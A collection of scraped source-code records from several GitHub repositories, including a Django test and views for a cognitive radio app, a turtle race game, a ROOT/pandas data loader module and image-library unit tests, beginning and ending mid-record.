os.makedirs(save_folder, exist_ok=True)\n images = [i for i in os.listdir(IMAGE_PATH1) if 'png' in i]\n for idx, img in enumerate(images):\n print('shape {0} cropping rate : {1}'.format(img_w,idx/len(images)))\n img_data = cv2.imread(os.path.join(IMAGE_PATH1, img))\n clip_image(img.strip('.png'), img_data, img_w, img_h, stride_w, stride_h,save_folder,padding_size) # crop & gt refine & saving\n\n print('-*--*--*--*-shape {0} cropping DONE-*--*--*--*-'.format(img_w))\n\n\ntest_folder = os.path.expanduser('~/ADD_dataset/test') # location of the test images\nIMAGE_PATH1 = os.path.expanduser('~/ADD_dataset/test/images') # folder holding the test images\n\nif __name__ == \"__main__\":\n\n # for multi processing\n cropping_size_list = [550,750,1050,1250,1550]\n\n pool = multiprocessing.Pool(processes=5) # 5 workers is the practical limit because of IO issues...\n pool.map(cropImg_makeLabel_Save_multiproc,cropping_size_list)\n pool.close()\n pool.join()\n print('processing done')\n\n\n\n\n\n\n","repo_name":"Genie-Kim/detectron2_ADDchallenge","sub_path":"module_jinkim/test_data_cropping.py","file_name":"test_data_cropping.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13406627634","text":"from django.conf import settings\nfrom django.test import TestCase\n\nfrom contuga.contrib.categories.models import Category\nfrom contuga.mixins import TestMixin\n\n\nclass CategorySignalsTests(TestCase, TestMixin):\n def test_signals(self):\n old_categories_count = Category.objects.count()\n user = self.create_user()\n new_categories_count = Category.objects.count()\n default_categories_len = len(settings.DEFAULT_CATEGORIES)\n\n # Assert default categories are created\n self.assertEqual(\n new_categories_count, old_categories_count + default_categories_len\n )\n\n new_categories = Category.objects.order_by(\"-pk\")[:default_categories_len]\n\n # Assert settings instance belongs to the correct user\n for category in new_categories:\n with self.subTest(category=category.name):\n self.assertEqual(category.author, user)\n
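 # (added note) subTest keeps the loop running after a failed assertion, reporting each default category separately.\n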
","repo_name":"contuga/contuga-web","sub_path":"contuga/contrib/categories/tests/test_signals.py","file_name":"test_signals.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71572456160","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom .models import Canales, RangoFrecuencias, Archivos\nfrom mutagen.mp3 import MP3\nfrom .forms import RangoFrecuenciasForm, SubirMP3Form\n\n\n\ndef post_list(request):\n return render(request, 'blog/post_list.html', {})\n\ndef home_view(request):\n \n return render(request, \"vista.html\")\n\n#STEP 1: SET THE FREQUENCY RANGE \ndef establecer_rango(request):\n if request.method == 'POST':\n form = RangoFrecuenciasForm(request.POST)\n if form.is_valid():\n frecuencia_inicial = form.cleaned_data['frecuencia_inicial']\n frecuencia_final = form.cleaned_data['frecuencia_final']\n form.save()\n return redirect('ver-rangos')\n else:\n form = RangoFrecuenciasForm()\n \n return render(request, 'vista.html', {'form': form})\n\ndef ver_rangos(request):\n rangos = RangoFrecuencias.objects.all()\n return render(request, 'index.html', {'rangos': rangos})\n\n#UPLOAD THE MP3 FILE\ndef subir_mp3(request):\n if request.method == 'POST':\n form = SubirMP3Form(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n archivo = form.cleaned_data['archivo_mp3']\n # Here you can do whatever you want with the file, such as saving it on the server or in the database\n return render(request, 'subir_mp3.html', {'form': form, 'mensaje': 'File uploaded successfully'})\n else:\n form = SubirMP3Form()\n return render(request, 'subir_mp3.html', {'form': form})\n\ndef anchoDeBandaMp3():\n archivo_mp3 = Archivos.objects.last() #last uploaded file\n info_mp3 = MP3(archivo_mp3)\n tasa_bits_audio = info_mp3.info.bitrate\n numero_simbolos_por_segundo = 1000\n ancho_banda_necesario = tasa_bits_audio / numero_simbolos_por_segundo\n print(f\"Required bandwidth: {ancho_banda_necesario:.2f} Hz\")\n return ancho_banda_necesario\n\ndef calcular_snr_min(capacidad, ancho_de_banda_minimo):\n snr_min = capacidad / ancho_de_banda_minimo\n return snr_min\n\n\n\n#STEP 2: RUN THE DETECTOR IN A THREAD SO IT STORES DATA ON THE AVAILABLE CHANNELS IN THE DATABASE\ndef bloqueCognitivo(request):\n canales = Canales.objects.all()\n mejor_espacio = None \n mejor_puntuacion = float('-inf')\n ancho_de_banda_minimo = anchoDeBandaMp3()\n capacidad = 1000\n potencia_maxima = -70\n snr_min = calcular_snr_min(capacidad, ancho_de_banda_minimo)\n print(f\"Minimum required SNR: {snr_min:.2f} dB\")\n #STEP 3: GET VALUES FROM THE Canales MODEL\n for canal in canales:\n frecuencia = canal.frecuencia\n ancho_banda_suficiente = canal.bandwith >= ancho_de_banda_minimo\n snr_aceptable = canal.snr >= snr_min\n potencia_baja = canal.potencia <= potencia_maxima\n # the score counts how many of the three criteria the channel satisfies\n puntuacion = ancho_banda_suficiente + snr_aceptable + potencia_baja\n\n if puntuacion > mejor_puntuacion:\n mejor_puntuacion = puntuacion\n mejor_espacio = canal\n\n return mejor_espacio\n\n\n# Define the minimum values for each parameter\n#ancho_banda_minimo_mp3 = 128 # kbps\n#snr_minimo = 10 # dB\n # dBm\n\n#STEP 4: RUN THE COGNITIVE BLOCK WITH THE CHANNEL INFORMATION AND PICK THE BEST ONE\n","repo_name":"nicoler229/radiocognitiva-master","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23632256520","text":"import turtle\nfrom turtle import *\nimport random,time\n\nspeed(0)\npenup()\ngoto(-180,140)\nw=turtle.Screen()\nw.title(\"Turtle Race\")\ntime.sleep(5)\nfor i in range(21):\n write(i, align=\"center\")\n right(90)\n forward(10)\n pendown()\n forward(180)\n penup()\n backward(190)\n left(90)\n forward(20)\n 
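# (added sketch, not in the original) the four near-identical turtle setups below could be built in a loop,\n# e.g. with a hypothetical helper: racers = [make_racer(c, y) for c, y in zip(('red', 'Blue', 'green', 'purple'), (100, 60, 20, -20))]\n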
\nrT=Turtle()\nrT.color(\"red\")\nrT.shape(\"turtle\")\nrT.penup()\nrT.goto(-180,100)\nbT=Turtle()\nbT.color(\"Blue\")\nbT.shape(\"turtle\")\nbT.penup()\nbT.goto(-180,60)\ngT=Turtle()\ngT.color(\"green\")\ngT.shape(\"turtle\")\ngT.penup()\ngT.goto(-180,20)\nyT=Turtle()\nyT.color(\"purple\")\nyT.shape(\"turtle\")\nyT.penup()\nyT.goto(-180,-20)\nrT.pendown()\nbT.pendown()\ngT.pendown()\nyT.pendown()\na=[1,2,3,4,5]\ndef p(x,y):\n rT.goto(-180,100)\n bT.goto(-180,60)\n gT.goto(-180,20)\n yT.goto(-180,-20)\n for i in range (132):\n \n '''rT.forward(random.randint(1,5))\n bT.forward(random.randint(1,5))\n gT.forward(random.randint(1,5))\n yT.forward(random.randint(1,5))'''\n rT.penup()\n bT.penup()\n gT.penup()\n yT.penup()\n rT.forward(random.choice(a))\n bT.forward(random.choice(a))\n gT.forward(random.choice(a))\n yT.forward(random.choice(a))\n r=rT.xcor()\n b=bT.xcor()\n g=gT.xcor()\n y=yT.xcor()\n s=[]\n s.append(r)\n s.append(b)\n s.append(g)\n s.append(y)\n s.sort(reverse=True)\n k=[\"FIRST\",\"SECOND\",\"THIRD\",\"FORTH\"]\n print(s)\n for i in range(4):\n if s[i]==r:\n m=\" RED TURTLE\"\n elif s[i]==b:\n m=\" BLUE TURTLE\"\n elif s[i]==g:\n m=\" GREEN TURTLE\"\n elif s[i]==y:\n m=\" PURPLE TURTLE\"\n print(\"{}:{}\".format(k[i],m))\nw.onclick(p)\n","repo_name":"werfree/Python","sub_path":"TurtleRace.py","file_name":"TurtleRace.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25398752619","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# @file loaders.py\n# @author Albert Puig (albert.puig@cern.ch)\n# @date 13.04.2017\n# =============================================================================\n\"\"\"Data loaders.\"\"\"\nfrom __future__ import print_function, division, absolute_import\n\nimport os\nimport random\nimport string\n\nimport ROOT\n\nimport numpy as np\nimport pandas as pd\nfrom root_pandas import read_root\nimport formulate\n\nfrom analysis.data.converters import dataset_from_pandas\nfrom analysis.utils.logging_color import get_logger\nfrom analysis.utils.root import destruct_object, list_to_rooarglist\n\n\nlogger = get_logger('analysis.data.loaders')\n\n\n###############################################################################\n# Helpers\n###############################################################################\ndef _analyze_weight_config(config):\n \"\"\"Analyze weight config.\n\n Arguments:\n config (dict): `get_data` configuration.\n\n Return:\n tuple (str, list, list): Name of the total weight variable, weight variables to\n normalize, weight variables not to normalize.\n\n Raise:\n KeyError: If there is some error in the configuration.\n ValueError: If there are common weights between to-normalize and not-to-normalize\n or if the name of the total weight variable corresponds to one of the weights.\n\n \"\"\"\n # Check weights\n weights_to_normalize = config.get('weights-to-normalize', [])\n weights_not_to_normalize = config.get('weights-not-to-normalize', [])\n if set(weights_to_normalize) & set(weights_not_to_normalize):\n logger.error(\"Common weights between 'weights-to-normalize' and 'weights-not-to-normalize'\")\n raise ValueError\n if not isinstance(weights_to_normalize, (list, tuple)):\n weights_to_normalize = [weights_to_normalize]\n if not isinstance(weights_not_to_normalize, (list, tuple)):\n weights_not_to_normalize = [weights_not_to_normalize]\n 
weights = weights_to_normalize + weights_not_to_normalize\n if weights:\n # If `weight-var-name` is specified, create a total weight variable with this name,\n # otherwise create a total weight variable `totalWeight`\n weight_var = config.get('weight-var-name', 'totalWeight')\n # If `weight_var-name` corresponds to a weight, raise an error\n if set(weights_to_normalize + weights_not_to_normalize).intersection([weight_var]):\n logger.error(\"'weight-var-name' is already used as weight\")\n raise ValueError\n else:\n weight_var = None\n return weight_var, weights_to_normalize, weights_not_to_normalize\n\n\ndef _get_root_from_dataframe(frame, kwargs):\n \"\"\"Properly load a pandas DataFrame into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it is not needed. Otherwise it has to be specified.\n + `acceptance`: Load an acceptance. This needs to be accompanied with a weight\n specification, either in `weights-to-normalize` or `weights-not-to-normalize`, which\n is either `acceptance_fit` or `acceptance_gen`. Depending on which one is\n specified, `acceptance.get_fit_weights` or `acceptance.get_gen_weights` is used.\n + `categories`: RooCategory variables to use.\n + `ranges`: Dictionary specifying min and max for the given variables. If not given,\n variables are unbound.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n **kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: pandas.DataFrame converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in the `kwargs` variables.\n ValueError: If there is an error in loading the acceptance.\n\n \"\"\"\n logger.debug(\"Loading pandas DataFrame in RooDataSet format\")\n # Checks and variable preparation\n try:\n name = kwargs['name']\n title = kwargs.get('title', name)\n except KeyError as error:\n raise KeyError(\"Missing configuration key -> {}\".format(error))\n # Check weights\n try:\n weight_var, weights_to_normalize, weights_not_to_normalize = _analyze_weight_config(kwargs)\n except KeyError:\n raise KeyError(\"Badly specified weights\")\n # Variables\n var_list = list(frame.columns)\n # Raise an error if some weights are not loaded.\n if var_list and not set(weights_to_normalize+weights_not_to_normalize).issubset(set(var_list)):\n raise ValueError(\"Missing weights in the list of variables read from input file.\")\n acc_var = ''\n # Acceptance specified\n if 'acceptance' in kwargs:\n if any('acceptance_fit' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n acc_var = 'acceptance_fit'\n if any('acceptance_gen' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n if acc_var:\n raise ValueError(\"Specified both 'acceptance_fit' and 'acceptance_gen' as weights.\")\n acc_var = 'acceptance_gen'\n if not acc_var:\n logger.warning(\"Requested acceptance but it has not been specified as a weight to use. 
Ignoring.\")\n\n if weight_var:\n if 'acceptance' in kwargs:\n if any('acceptance_fit' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n acc_var = 'acceptance_fit'\n if any('acceptance_gen' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n if acc_var:\n raise ValueError(\"Specified both 'acceptance_fit' and 'acceptance_gen' as weights.\")\n acc_var = 'acceptance_gen'\n if not acc_var:\n logger.warning(\"Requested acceptance but it has not been specified as a weight to use. Ignoring.\")\n if acc_var:\n from analysis.efficiency import get_acceptance\n try:\n acceptance = get_acceptance(kwargs['acceptance'])\n except Exception as error:\n raise ValueError(str(error))\n if acc_var in frame.columns:\n raise ValueError(\"Name clash: the column '{}' is present in the dataset\".format(acc_var))\n if acc_var == 'acceptance_fit':\n frame['acceptance_fit'] = acceptance.get_fit_weights(frame)\n else:\n frame['acceptance_gen'] = acceptance.get_gen_weights(frame)\n # Apply weights\n if weight_var:\n frame[weight_var] = np.prod([frame[w_var] for w_var in weights_to_normalize],\n axis=0)\n frame[weight_var] = frame[weight_var]/frame[weight_var].sum()*frame.shape[0]\n frame[weight_var] = np.prod([frame[w_var] for w_var in weights_not_to_normalize + [weight_var]],\n axis=0)\n if var_list is not None and weight_var:\n var_list.append(weight_var)\n # Process ranges\n ranges = kwargs.get('ranges')\n if ranges:\n for var_name, range_val in ranges.items():\n try:\n if isinstance(range_val, str):\n min_, max_ = range_val.split()\n else:\n min_, max_ = range_val\n except ValueError:\n raise KeyError(\"Malformed range specification for {} -> {}\".format(var_name, range_val))\n ranges[var_name] = (float(min_), float(max_))\n # Convert it\n return dataset_from_pandas(frame, name, title,\n var_list=var_list,\n weight_var=weight_var,\n categories=kwargs.get('categories'),\n ranges=ranges)\n\n\n###############################################################################\n# Load pandas files\n###############################################################################\ndef _load_pandas(file_name, tree_name, kwargs):\n \"\"\"Load the pandas dataset.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n kwargs (dict): Optional configuration keys.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it is not needed. 
Otherwise it has to be specified.\n\n Return:\n pandas.DataFrame\n\n Raise:\n OSError: If the input file does not exist.\n KeyError: If the tree is not found or some of the requested branches are missing.\n ValueError: If the weights are not properly specified.\n\n \"\"\"\n selection = kwargs.get('selection')\n # Check weights\n try:\n _, weights_to_normalize, weights_not_to_normalize = _analyze_weight_config(kwargs)\n except KeyError:\n raise ValueError(\"Badly specified weights\")\n # Variables\n variables = kwargs.get('variables')\n if variables is not None:\n variables = list(set(variables +\n weights_to_normalize +\n weights_not_to_normalize))\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n with pd.HDFStore(file_name, 'r') as store:\n if tree_name not in store:\n raise KeyError(\"Cannot find tree in input file -> {}\".format(tree_name))\n if selection:\n output_data = store[tree_name].query(selection)\n if variables:\n output_data = output_data[variables]\n else:\n try:\n output_data = store.select(tree_name, columns=variables)\n except TypeError:\n logger.warning(\"Column specification given for loading a fixed store. Loading will be slower.\")\n output_data = store.select(tree_name)\n if variables:\n output_data = output_data[variables]\n return output_data\n\n\ndef get_pandas_from_pandas_file(file_name, tree_name, kwargs):\n \"\"\"Load a pandas DataFrame from HDF file.\n\n Optional keys in `kwargs` are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n **kwargs (dict): Extra configuration.\n\n \"\"\"\n logger.debug(\"Loading pandas file in pandas format -> %s:%s\",\n file_name, tree_name)\n return _load_pandas(file_name, tree_name, kwargs)\n\n\ndef get_root_from_pandas_file(file_name, tree_name, kwargs):\n \"\"\"Load a pandas HDF file into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it is not needed. Otherwise it has to be specified.\n + `acceptance`: Load an acceptance. This needs to be accompanied with a weight\n specification, either in `weights-to-normalize` or `weights-not-to-normalize`, which\n is either `acceptance_fit` or `acceptance_gen`. 
Depending on which one is\n specified, `acceptance.get_fit_weights` or `acceptance.get_gen_weights` is used.\n + `categories`: RooCategory variables to use.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n **kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: pandas.DataFrame converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in the `kwargs` variables.\n ValueError: If there is an error in loading the acceptance.\n\n \"\"\"\n logger.debug(\"Loading pandas file in RooDataSet format -> %s:%s\",\n file_name, tree_name)\n return _get_root_from_dataframe(_load_pandas(file_name, tree_name, kwargs),\n kwargs)\n\n\n###############################################################################\n# Load CSV files\n###############################################################################\ndef _load_csv(file_name, kwargs):\n \"\"\"Load a pandas dataset from a CSV file.\n\n Arguments:\n file_name (str): File to load.\n kwargs (dict): Configuration: `selection` and `variables`.\n\n Return:\n pandas.DataFrame\n\n Raise:\n OSError: If the input file does not exist.\n KeyError: If the tree is not found or some of the requested branches are missing.\n\n \"\"\"\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n output_data = pd.read_csv(file_name)\n selection = kwargs.get('selection')\n if selection:\n output_data = output_data.query(selection)\n variables = kwargs.get('variables')\n if variables:\n output_data = output_data[variables]\n return output_data\n\n\ndef get_pandas_from_csv_file(file_name, _, kwargs):\n \"\"\"Load a pandas DataFrame from CSV file.\n\n Optional keys in `kwargs` are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n\n Arguments:\n file_name (str): File to load.\n **kwargs (dict): Extra configuration.\n\n \"\"\"\n logger.debug(\"Loading CSV file in pandas format -> %s\", file_name)\n return _load_csv(file_name, kwargs)\n\n\ndef get_root_from_csv_file(file_name, _, kwargs):\n \"\"\"Load a CSV file into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it is not needed. Otherwise it has to be specified.\n + `acceptance`: Load an acceptance. This needs to be accompanied with a weight\n specification, either in `weights-to-normalize` or `weights-not-to-normalize`, which\n is either `acceptance_fit` or `acceptance_gen`. 
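The acceptance mechanism described in the docstring above is driven purely by configuration: listing `acceptance_fit` (or `acceptance_gen`) among the weights selects which acceptance method is applied. A hypothetical configuration; the YAML path and dataset name are illustrative, not from the package:

config = {'name': 'data',
          'title': 'my dataset',
          'acceptance': 'acceptance-config.yaml',      # illustrative path
          'weights-to-normalize': ['acceptance_fit']}  # selects acceptance.get_fit_weights
# dataset = get_root_from_csv_file('candidates.csv', None, config)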
Depending on which one is\n specified, `acceptance.get_fit_weights` or `acceptance.get_gen_weights` is used.\n + `categories`: RooCategory variables to use.\n\n Arguments:\n file_name (str): File to load.\n **kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: pandas.DataFrame converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in the `kwargs` variables.\n ValueError: If there is an error in loading the acceptance.\n\n \"\"\"\n logger.debug(\"Loading CSV file in RooDataSet format -> %s\", file_name)\n return _get_root_from_dataframe(_load_csv(file_name, kwargs), kwargs)\n\n\n###############################################################################\n# Load ROOT files\n###############################################################################\ndef get_root_from_root_file(file_name, tree_name, kwargs):\n \"\"\"Load a ROOT tree into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `ranges`: Range to apply to some variables.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: ROOT file converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in `kwargs`.\n ValueError: If the requested variables cannot be found in the input file.\n OSError: If the ROOT file cannot be found.\n\n \"\"\"\n def get_list_of_leaves(tree):\n \"\"\"Get list of leave names from a tree matching a certain regex.\n\n Arguments:\n tree (`ROOT.TTree`): Tree to extract the leaves from.\n\n Return:\n list: Leaves of the tree.\n\n \"\"\"\n object_list = tree.GetListOfLeaves()\n it = object_list.MakeIterator()\n output = set()\n for _ in range(object_list.GetSize()):\n obj = it.Next()\n if obj:\n output.add(obj.GetName())\n return output \n\n logger.debug(\"Loading ROOT file in RooDataSet format -> %s:%s\",\n file_name, tree_name)\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n try:\n name = kwargs['name']\n title = kwargs.get('title', name)\n except KeyError as error:\n raise KeyError(\"Missing configuration key -> {}\".format(error))\n tfile = ROOT.TFile.Open(file_name)\n tree = tfile.Get(tree_name)\n if not tree:\n raise KeyError(\"Cannot find tree in input file -> {}\".format(tree_name))\n leaves = get_list_of_leaves(tree)\n variables = set(kwargs.get('variables', leaves))\n # Acceptance\n if 'acceptance' in kwargs:\n raise NotImplementedError(\"Acceptance weights are not implemented for ROOT files\")\n # Check weights\n try:\n weight_var, weights_to_normalize, weights_not_to_normalize = _analyze_weight_config(kwargs)\n except KeyError:\n raise KeyError(\"Badly specified weights\")\n if variables and weight_var:\n variables = set(variables) | set(weights_to_normalize) | set(weights_not_to_normalize)\n # Crosscheck leaves\n if variables - leaves:\n raise ValueError(\"Cannot find leaves in input -> {}\".format(variables - leaves))\n selection = kwargs.get('selection')\n leave_set = ROOT.RooArgSet()\n leave_list = []\n if selection:\n selection_expr = formulate.from_root(selection)\n for var in selection_expr.variables.union(variables):\n leave_list.append(ROOT.RooRealVar(var, var, 0.0))\n leave_set.add(leave_list[-1])\n name = ''.join(random.SystemRandom().choice(string.ascii_letters + string.digits)\n for _ in range(10))\n temp_ds = 
ROOT.RooDataSet(name, name,\n leave_set,\n ROOT.RooFit.Import(tree),\n ROOT.RooFit.Cut(selection))\n destruct_object(tree)\n tree = temp_ds\n var_set = ROOT.RooArgSet()\n var_list = {}\n for var in variables:\n var_list[var] = ROOT.RooRealVar(var, var, 0.0)\n var_set.add(var_list[var])\n if kwargs.get('ranges'):\n for var_name, range_val in kwargs['ranges'].items():\n if var_name not in var_list:\n raise KeyError(\"Range specified for a variable not included in the dataset -> {}\".format(var_name))\n try:\n if isinstance(range_val, str):\n min_, max_ = range_val.split()\n else:\n min_, max_ = range_val\n except ValueError:\n raise KeyError(\"Malformed range specification for {} -> {}\".format(var_name, range_val))\n var_set[var_name].setMin(float(min_))\n var_set[var_name].setMax(float(max_))\n dataset = ROOT.RooDataSet(name, title, var_set, ROOT.RooFit.Import(tree))\n if weight_var:\n # Weights to normalize\n to_normalize_w = ROOT.RooFormulaVar(\"{}_not_normalized\".format(weight_var),\n \"{}_not_normalized\".format(weight_var),\n \"*\".join(weights_to_normalize),\n list_to_rooarglist(var_list[weight] for weight in weights_to_normalize))\n var_set.append(to_normalize_w)\n dataset.addColumn(to_normalize_w)\n sum_weights = sum(dataset.get(entry)[\"{}_not_normalized\".format(weight_var)].getVal()\n for entry in dataset.sumEntries())\n normalized_w = ROOT.RooFormulaVar(\"{}_normalized\".format(weight_var),\n \"{}_normalized\".format(weight_var),\n \"{}_not_normalized/{}\".format(weight_var, sum_weights),\n ROOT.RooArgList(to_normalize_w))\n var_set.append(normalized_w)\n dataset.addColumn(normalized_w)\n # Non-normalized weights\n weights = ROOT.RooFormulaVar(weight_var,\n weight_var,\n \"*\".join(weights_not_to_normalize + [\"{}_normalized\".format(weight_var)]),\n list_to_rooarglist([var_list[weight] for weight in weights_not_to_normalize] +\n [normalized_w]))\n var_set.append(weights)\n dataset.addColumn(weights)\n dataset_w = ROOT.RooDataSet(name, title, var_set,\n ROOT.RooFit.Import(dataset),\n ROOT.RooFit.WeightVar(weight_var))\n destruct_object(dataset)\n dataset = dataset_w\n # ROOT Cleanup\n destruct_object(tree)\n tfile.Close()\n destruct_object(tfile)\n if selection:\n for leave in leave_list:\n destruct_object(leave)\n for var in variables:\n destruct_object(var_list[var])\n # Let's return\n dataset.SetName(name)\n dataset.SetTitle(title)\n return dataset\n\n\ndef get_pandas_from_root_file(file_name, tree_name, kwargs):\n \"\"\"Load a pandas DataFrame from a ROOT file.\n\n Optional keys in `kwargs` are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n kwargs (dict): Extra configuration.\n\n Return:\n pandas.DataFrame: ROOT file converted to pandas.\n\n \"\"\"\n logger.debug(\"Loading ROOT file in pandas format -> %s:%s\",\n file_name, tree_name)\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n selection = kwargs.get('selection')\n variables = kwargs.get('variables', [])\n if selection:\n selection_expr = formulate.from_numexpr(selection)\n full_variables = variables + list(selection_expr.variables)\n output_data = read_root(file_name, tree_name, columns=full_variables).query(selection)\n if variables:\n output_data = output_data[variables]\n else:\n output_data = read_root(file_name, tree_name, columns=variables)\n return output_data\n\n\n# 
EOF\n","repo_name":"apuignav/analysis-tools","sub_path":"analysis/data/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":23962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15922017165","text":"\"\"\"\nUnit tests for `dh.image`.\n\"\"\"\n\nimport tempfile\nimport unittest\n\nimport numpy as np\n\nimport dh.data\nimport dh.image\n\n\nclass Test(unittest.TestCase):\n def test_save_load_decode(self):\n # images to be saved\n (_, filename) = tempfile.mkstemp(suffix=\".png\")\n C8 = dh.data.lena()\n C16 = np.array(C8, dtype=\"uint16\")\n G8 = dh.image.asgray(C8)\n G16 = dh.image.asgray(C16)\n\n for I in (C8, C16, G8, G16):\n for color in (None, False, True):\n # save image\n dh.image.save(filename, I)\n\n # load image from file\n J = dh.image.load(filename, color=color)\n\n # decode image from byte array\n with open(filename, \"rb\") as f:\n K = dh.image.decode(f.read(), color=color)\n\n # make sure that load and decode are identical\n self.assertEqual(J.shape, K.shape)\n self.assertEqual(J.dtype, K.dtype)\n self.assertTrue(np.all(J == K))\n\n # expected image\n if color or ((color is None) and dh.image.iscolor(I)):\n E = dh.image.ascolor(I)\n else:\n E = dh.image.asgray(I)\n\n # compare loaded image with expected image\n self.assertEqual(J.dtype, E.dtype)\n self.assertEqual(J.shape, E.shape)\n if color in (None, True):\n # if I is a color image and color=False, then the conversion to gray scale will be performed by OpenCV, which is different than dh.image.asgray\n self.assertTrue(np.all(J == E))\n\n\n def test_stack(self):\n # images\n L = dh.data.lena()\n M = dh.image.convert(dh.data.M(300, 200).astype(\"uint16\"), \"uint8\")\n G1 = dh.data.grid([350, 500])\n G2 = dh.data.grid([200, 200])\n P = dh.data.pal()\n\n # test default stacking\n S = dh.image.stack([[L, M], [G1, G2], [P]])\n self.assertEqual(S.shape, (1438, 768, 3))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 89.258657616674398)\n\n # test default stacking with a 1D image vector (one row)\n S = dh.image.stack([L, M, G1, G2, P])\n self.assertEqual(S.shape, (576, 2180, 3))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 78.503944741760108)\n\n # test stacking with padding\n S = dh.image.stack([[L, M], [G1, G2], [P]], padding=32)\n self.assertEqual(S.shape, (1566, 832, 3))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 75.658089981006654)\n\n # test stacking with forced dtype\n S = dh.image.stack([[L, M], [G1, G2], [P]], dtype=\"float\")\n self.assertEqual(S.shape, (1438, 768, 3))\n self.assertEqual(S.dtype, np.float)\n self.assertAlmostEqual(S.mean(), 0.35003395143793881)\n\n # test stacking with forced gray mode\n S = dh.image.stack([[L, M], [G1, G2], [P]], gray=True)\n self.assertEqual(S.shape, (1438, 768))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 89.139465982846545)\n\n def test_text(self):\n I = dh.data.lena()\n dh.image.text(I, \"The quick brown fox jumps over the lazy dog.\")\n for nChannel in range(3):\n self.assertEqual(I[0, 0, nChannel], 0)\n self.assertAlmostEqual(I.mean(), 121.48126602172852)\n\n def test_convert_fromBool(self):\n # create bool image\n L = dh.data.lena()\n L = dh.image.asgray(L)\n L = (L > 127)\n m = L.mean()\n\n C = dh.image.convert(L, \"uint8\")\n self.assertAlmostEqual(C.mean(), 255.0 * m)\n\n C = dh.image.convert(L, \"uint16\")\n self.assertAlmostEqual(C.mean(), 65535.0 * m)\n\n C = dh.image.convert(L, 
